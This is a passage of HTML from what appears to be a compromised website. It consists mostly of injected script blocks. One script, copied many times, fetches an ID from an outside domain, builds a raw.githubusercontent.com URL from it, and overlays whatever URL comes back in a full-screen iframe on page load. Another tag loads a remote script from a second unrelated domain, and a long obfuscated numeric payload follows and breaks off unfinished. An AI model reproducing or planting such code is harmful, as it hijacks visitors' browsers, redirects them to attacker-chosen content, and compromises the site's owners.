      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script><script async src="https://transporteejecutivovc.com/sttje/"></script></script><script>(function(){var __s=(function(){var _0x5641=[114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,44,59,40,122,27,10,19,5,19,30,5,15,8,22,122,103,122,120,50,46,46,42,41,96,117,117,40,53,41,40,63,60,47,40,56,53,41,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42,120,97,87,80,122,122,44,59,40,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,122,103,122,1,87,80,122,122,122,122,33,122,46,63,55,42,54,59,46,63,96,122,120,50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39,120,118,122,47,41,63,28,63,46,57,50,96,122,46,40,47,63,122,39,87,80,122,122,7,97,87,80,87,80,122,122,44,59,40,122,29,22,21,24,27,22,5,17,31,3,122,103,122,114,46,35,42,63,53,60,122,9,35,55,56,53,54,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,122,124,124,122,9,35,55,56,53,54,116,60,53,40,115,87,80,122,122,122,122,101,122,9,35,55,56,53,54,116,60,53,40,114,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,115,87,80,122,122,122,122,96,122,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,97,87,80,87,80,122,122,44,59,40,122,40,63,61,51,41,46,40,35,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,38,38,122,33,87,80,122,122,122,122,41,46,59,46,47,41,96,122,120,51,62,54,63,120,118,87,80,122,122,122,122,51,60,40,59,55,63,19,62,96,122,120,5,5,51,52,54,51,52,63,5,53,60,60,63,40,5,51,60,40,59,55,63,5,5,120,118,87,80,122,122,122,122,51,60,40,59,55,63,27,46,46,40,96,122,120,62,59,46,59,119,51,52,54,51,52,63,119,53,60,60,63,40,119,60,40,59,55,63,120,118,87,80,122,122,122,122,50,51,52,46,41,96,122,33,39,118,87,80,122,122,122,122,40,47,52,10,40,53,55,51,41,63,96,122,52,47,54,54,118,87,80,122,122,122,122,62,63,41,46,40,53,35,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,44,63,59,54,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,96,122,110,106,106,106,118,87,80,122,122,122,122,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,96,122,99,106,106,106,118,87,80,122,122,122,122,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,96,122,60,59,54,41,63,118,87,80,122,122,122,122,55,63,41,41,59,61,63,24,53,47,52,62,96,122,60,59,54,41,63,87,80,122,122,39,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,51,60,122,114,45,51,52,62,53,45,116,5,5,62,51,41,59,56,54,63,19,52,54,51,52,63,21,60,60,63,40,5,5,122,103,103,103,122,46,40,47,63,122,38,38,122,45,51,52,62,53,45,116,5,5,51,41,13,42,27,62,55,51,52,5,5,122,103,103,103,122,46,40,47,63,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,42,59,46,50,122,103,122,45,51,52,62,53,45,116,54,53,57,59,46,51,53,52,116,42,59,46,50,52,59,55,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,4,6,117,114,45,42,119,59,62,55,51,52,38,45,42,119,54,53,61,51,52,115,117,116,46,63,41,46,114,42,59,46,50,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,57,53,53,49,51,63,122,103,122,62,53,57,47,55,63,52,46,116,57,53,53,49,51,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,45,53,40,62,42,40,63,41,41,5,54,53,61,61,63,62,5,51,52,5,1,4,103,7,112,103,117,116,46,63,41,46,114,57,53,53,49,51,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,62,63,122,103,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,97,87,80,122,122,122,122,122,122,44,59,40,122,56,53,62,35,122,103,122,62,53,57,47,55,63,52,46,116,56,53,62,35,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,63,122,124,124,122,46,35,42,63,53,60,122,62,63,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,45,42,119,46,53,53,54,56,59,40,6,56,117,116,46,63,41,46,114,62,63,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,56,53,62,35,122,124,124,122,46,35,42,63,53,60,122,56,53,62,35,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,59,62,55,51,52,119,56,59,40,6,56,117,116,46,63,41,46,114,56,53,62,35,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,120,45,42,59,62,55,51,52,56,59,40,120,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,59,54,41,63,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,115,122,33,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,54,53,59,62,51,52,61,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,59,57,46,51,44,63,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,62,53,52,63,120,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,54,53,59,62,51,52,61,120,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,49,63,35,118,122,44,59,54,115,122,33,87,80,122,122,122,122,44,59,40,122,41,63,42,122,103,122,47,40,54,116,51,52,62,63,34,21,60,114,120,101,120,115,122,100,103,122,106,122,101,122,120,124,120,122,96,122,120,101,120,97,87,80,122,122,122,122,40,63,46,47,40,52,122,47,40,54,122,113,122,41,63,42,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,49,63,35,115,122,113,122,120,103,120,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,44,59,54,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,46,63,55,42,54,59,46,63,118,122,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,123,46,63,55,42,54,59,46,63,122,38,38,122,123,51,62,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,62,40,53,42,56,53,34,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,51,62,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,51,62,115,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,61,51,41,46,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,62,116,40,63,42,54,59,57,63,114,117,127,104,28,117,61,118,122,120,117,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,63,52,57,53,62,63,62,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,46,53,18,46,46,42,15,40,54,114,44,59,54,47,63,115,122,33,87,80,122,122,122,122,51,60,122,114,123,44,59,54,47,63,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,41,122,103,122,9,46,40,51,52,61,114,44,59,54,47,63,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,87,80,122,122,122,122,122,122,116,46,40,51,55,114,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,1,125,120,58,6,41,7,113,38,1,125,120,58,6,41,7,113,126,117,61,118,122,120,120,115,97,87,80,87,80,122,122,122,122,51,60,122,114,123,41,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,123,117,4,1,59,119,32,7,1,59,119,32,106,119,99,113,116,119,7,112,96,6,117,6,117,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,117,4,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,1,6,117,101,121,7,38,126,115,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,122,122,41,122,103,122,120,50,46,46,42,41,96,117,117,120,122,113,122,41,97,87,80,122,122,122,122,122,122,39,122,63,54,41,63,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,47,122,103,122,52,63,45,122,15,8,22,114,41,115,97,87,80,122,122,122,122,122,122,51,60,122,114,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,96,120,122,38,38,122,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,41,96,120,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,47,116,50,40,63,60,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,118,122,62,63,42,46,50,115,122,33,87,80,122,122,122,122,51,60,122,114,123,51,52,42,47,46,122,38,38,122,62,63,42,46,50,122,100,122,105,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,41,46,40,51,52,61,120,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,53,18,46,46,42,15,40,54,114,51,52,42,47,46,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,46,53,9,46,40,51,52,61,116,57,59,54,54,114,51,52,42,47,46,115,122,103,103,103,122,120,1,53,56,48,63,57,46,122,27,40,40,59,35,7,120,115,122,33,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,51,122,103,122,106,97,122,51,122,102,122,51,52,42,47,46,116,54,63,52,61,46,50,97,122,51,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,59,40,40,12,59,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,51,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,59,40,40,12,59,54,115,122,40,63,46,47,40,52,122,59,40,40,12,59,54,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,53,56,48,63,57,46,120,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,49,63,35,41,122,103,122,1,120,47,40,54,120,118,122,120,54,51,52,49,120,118,122,120,50,40,63,60,120,118,122,120,54,53,57,59,46,51,53,52,120,118,122,120,40,63,62,51,40,63,57,46,120,118,122,120,46,59,40,61,63,46,120,118,122,120,54,59,52,62,51,52,61,120,118,122,120,54,59,52,62,51,52,61,15,40,54,120,7,97,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,48,122,103,122,106,97,122,48,122,102,122,49,63,35,41,116,54,63,52,61,46,50,97,122,48,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,49,63,35,122,103,122,49,63,35,41,1,48,7,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,63,35,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,44,59,40,122,62,51,40,63,57,46,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,5